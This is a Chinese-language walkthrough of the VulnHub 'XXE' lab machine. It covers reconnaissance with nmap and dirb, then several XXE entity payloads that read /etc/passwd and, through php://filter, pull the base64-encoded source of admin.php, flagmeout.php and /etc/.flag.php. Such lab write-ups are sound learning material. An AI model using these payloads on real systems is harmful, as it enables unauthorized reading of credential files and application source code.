vulnhub-XXE靶机

仅供个人娱乐

靶机信息

靶机下载地址：https://download.vulnhub.com/xxe/XXE.zip

一、主机探测

二、端口服务识别

nmap -sV 192.168.181.149

存在web端口  打开web界面

三、漏洞查找和利用

扫描目录

dirb http://192.168.181.149

打开网页

打开目录

使用burp抓包

（个人）网络问题     靶机 ip改为 192.168.204.130

打开网络http://192.168.204.130/xxe/  进行抓包

发现xxe文件

或者查看源码

修改xxe格式读取密码

<?xml version="1.0" encoding="UTF-8"?>            #防止乱码

<!DOCTYPE r [

<!ELEMENT r ANY >

<!ENTITY admin SYSTEM "file:///etc/passwd">          #读取密码文件

]>

<root><name>&admin;</name><password>1</password></root>

发现可以抓取密码

原来admin.php页面和源码为

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE r [

<!ELEMENT r ANY >

<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">

]>

<root><name>&admin;</name><password>1</password></root>

发现admin.php页面源码

返回包进行了加密  使用在线解密

将密码进行cmd5解密

进行登录  登录失败

点击flag

查看源码没有东西

继续寻找有用信息

查看源码

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE r [

<!ELEMENT r ANY >

<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=flagmeout.php">

]>

<root><name>&admin;</name><password>1</password></root>

复制base64解码

使用各种方式  解密     最后  base32密码解密

使用base64解密

抓包修改参数flag.php  出现乱码

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE r [

<!ELEMENT r ANY >

<!ENTITY admin SYSTEM "file:///etc/.flag.php">

]>

<root><name>&admin;</name><password>1</password></root>

查看源码

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE r [

<!ELEMENT r ANY >

<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">

]>

<root><name>&admin;</name><password>1</password></root>

使用base64解码  失败

最终使用phpstudy，开启错误显示，本地访问这个webshell得到了flag